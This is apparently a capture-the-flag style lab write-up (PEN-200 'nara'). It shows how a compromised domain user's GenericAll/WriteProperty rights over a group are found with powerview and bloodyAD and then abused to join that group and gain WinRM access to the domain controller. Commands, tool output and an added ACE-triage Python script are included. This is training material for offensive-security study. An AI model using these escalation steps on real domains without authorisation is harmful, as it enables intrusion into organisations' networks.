GenericAll


During BloodHound enumeration it was identified that the compromised tracy.white user has GenericAll over the Remote Access group. Remote Access is nested in the Remote Management Users group, which allows WinRM access to the domain controller nara.nara-security.com (192.168.209.30).

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=tracy.white@nara.nara-security.com.ccache powerview NARA-SECURITY.COM/@nara.nara-security.com --no-pass -k -ns $IP --use-ldaps --dc-ip $IP -q 'Get-DomainObjectAcl -SecurityIdentifier tracy.white'         
Logging directory is set to /home/kali/.powerview/logs/nara-security-nara.nara-security.com
[2025-07-01 16:31:38] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
[2025-07-01 16:31:39] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN                    : CN=Remote Access,OU=remote,DC=nara-security,DC=com
ObjectSID                   : S-1-5-21-914744703-3800712539-3320214069-1115
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask                  : ControlAccess, CreateChild, DeleteChild, ReadProperty, WriteProperty, Self
ObjectAceFlags              : None
InheritanceType             : None
SecurityIdentifier          : NARA-SECURITY\Tracy.White
 
ObjectDN                    : OU=remote,DC=nara-security,DC=com
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE
AccessMask                  : ControlAccess, CreateChild, DeleteChild, ReadProperty, WriteProperty, Self
ObjectAceFlags              : None
InheritanceType             : None
SecurityIdentifier          : NARA-SECURITY\Tracy.White
 
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=tracy.white@nara.nara-security.com.ccache bloodyAD -d NARA-SECURITY.COM -k --host nara.nara-security.com --dc-ip $IP get writable
 
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=nara-security,DC=com
permission: WRITE
 
distinguishedName: CN=Tracy White,OU=staff,DC=nara-security,DC=com
permission: WRITE
 
distinguishedName: OU=remote,DC=nara-security,DC=com
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
 
distinguishedName: CN=Remote Access,OU=remote,DC=nara-security,DC=com
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE

Both tools confirm the BloodHound finding. powerview's Get-DomainObjectAcl shows an ACCESS_ALLOWED_OBJECT_ACE for Tracy.White on CN=Remote Access carrying CreateChild, DeleteChild, WriteProperty and Self with no object type set (ObjectAceFlags: None), so the WriteProperty right covers every attribute of the group, including member. The ACE is marked INHERITED_ACE and matches the non-inherited, container-inheritable ACE on OU=remote, so any object placed in that OU is equally writable. bloodyAD's get writable reports the same two objects and additionally shows write access to their owner and DACL, which means membership could also be obtained by rewriting the DACL or taking ownership if WriteProperty were ever removed.
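As an added example (not code from this write-up, powerview or bloodyAD), the following Python script parses powerview-style Get-DomainObjectAcl records and maps each ACE over a group to the abuse primitive it actually grants, so an ACE is not misread: WriteProperty only lets you add members when the object ACE is not restricted to some other attribute or property set. The first record is transcribed from the output above; the second record, the ObjectAceType field name and the non-member property-set GUID in it are constructed assumptions for illustration.

```python
"""
Triage ACEs over AD group objects and map them to abuse primitives.

Added example for this write-up; not code from powerview.py or bloodyAD.
Parses the 'Key : Value' record format that powerview prints for
Get-DomainObjectAcl (records separated by blank lines).
"""

# Schema GUID of the 'member' attribute. The Self-Membership validated
# write right that lets a principal add only itself uses the same GUID.
MEMBER_ATTR_GUID = "bf9679c0-0de6-11d0-a285-00aa003049e2"

# Constructed sample. The first record is transcribed from the powerview
# output in this write-up; the second is an assumed, constructed ACE whose
# WriteProperty is restricted to a property set that is not 'member'.
# 'ObjectAceType' is an assumed field name for the object type GUID.
SAMPLE_ACL = r"""
ObjectDN                    : CN=Remote Access,OU=remote,DC=nara-security,DC=com
ObjectSID                   : S-1-5-21-914744703-3800712539-3320214069-1115
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask                  : ControlAccess, CreateChild, DeleteChild, ReadProperty, WriteProperty, Self
ObjectAceFlags              : None
InheritanceType             : None
SecurityIdentifier          : NARA-SECURITY\Tracy.White

ObjectDN                    : CN=Restricted Group,OU=remote,DC=nara-security,DC=com
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
AccessMask                  : ReadProperty, WriteProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT
ObjectAceType               : e48d0154-bcf8-11d1-8702-00c04fb96050
SecurityIdentifier          : NARA-SECURITY\Tracy.White
"""


def parse_powerview_acl(text):
    """Split blank-line separated 'Key : Value' records into a list of dicts."""
    records, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        key, sep, value = line.partition(":")
        if sep:
            current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def _tokens(record, field):
    """Comma-separated field -> set of lowercase tokens (empty set if absent)."""
    return {t.strip().lower() for t in record.get(field, "").split(",") if t.strip()}


def group_abuse_primitives(record):
    """
    Map one ACE granted over a group object to the abuse primitives it allows.

    Returns a sorted list of:
      AddMember       - write the 'member' attribute (Add-DomainGroupMember)
      AddSelfAsMember - Self-Membership validated write (add only yourself)
      WriteDacl       - rewrite the group's DACL and grant yourself anything
      WriteOwner      - take ownership of the group, then rewrite its DACL
    The caller is responsible for only passing ACEs whose ObjectDN is a group.
    """
    rights = _tokens(record, "AccessMask")
    if "genericall" in rights:
        return ["AddMember", "AddSelfAsMember", "WriteDacl", "WriteOwner"]

    # An object ACE with an object type set applies only to that attribute
    # or property set; without one, WriteProperty/Self cover every attribute.
    flags = _tokens(record, "ObjectAceFlags")
    type_present = bool(flags & {"ace_object_type_present", "object_type_present"})
    object_type = record.get("ObjectAceType", "").strip().lower()
    covers_member = (not type_present) or object_type == MEMBER_ATTR_GUID

    prims = set()
    if rights & {"writeproperty", "genericwrite"} and covers_member:
        prims.add("AddMember")
    if "self" in rights and covers_member:
        prims.add("AddSelfAsMember")
    if "writedacl" in rights:
        prims.add("WriteDacl")
    if "writeowner" in rights:
        prims.add("WriteOwner")
    return sorted(prims)


def triage(text):
    """Return {ObjectDN: [primitives]} for every record in powerview output."""
    return {
        rec["ObjectDN"]: group_abuse_primitives(rec)
        for rec in parse_powerview_acl(text)
        if "ObjectDN" in rec
    }


if __name__ == "__main__":
    for dn, prims in triage(SAMPLE_ACL).items():
        print(f"{dn}\n    -> {', '.join(prims) or 'no group-membership abuse'}")
```

Run against the sample, the Remote Access ACE resolves to AddMember and AddSelfAsMember (the powerview output names neither WriteDACL nor WriteOwner, so those come only from the bloodyAD view), while the constructed restricted ACE resolves to nothing despite also carrying WriteProperty. The script deliberately ignores object class; filter the records to groups before trusting the result, since WriteProperty on a user object means something different (for example, SPN or script path writes).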

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=tracy.white@nara.nara-security.com.ccache powerview NARA-SECURITY.COM/@nara.nara-security.com --no-pass -k -ns $IP --use-ldaps --dc-ip $IP -q 'Add-DomainGroupMember -Identity "Remote Access" -Members tracy.white'
Logging directory is set to /home/kali/.powerview/logs/nara-security-nara.nara-security.com
[2025-07-01 16:35:24] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
[2025-07-01 16:35:24] User tracy.white successfully added to Remote Access
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=tracy.white@nara.nara-security.com.ccache bloodyAD -d NARA-SECURITY.COM -k --host nara.nara-security.com --dc-ip $IP add groupMember 'Remote Access' 'tracy.white'                                                     
[+] tracy.white added to Remote Access

Either powerview's Add-DomainGroupMember or bloodyAD's add groupMember is sufficient to add the compromised tracy.white user to the Remote Access group; both are shown above for reference. tracy.white is now a transitive member of Remote Management Users through Remote Access, so direct WinRM access to nara.nara-security.com (192.168.209.30) is possible. Two caveats apply. Group membership is written into the PAC when a Kerberos ticket is issued, so the existing tracy.white ccache does not carry the new group and a fresh TGT (and with it a fresh service ticket for the host) must be obtained before authenticating over WinRM, otherwise the logon is still evaluated with the old membership. The group change is also a persistent modification to the domain and should be recorded and reverted at the end of the engagement.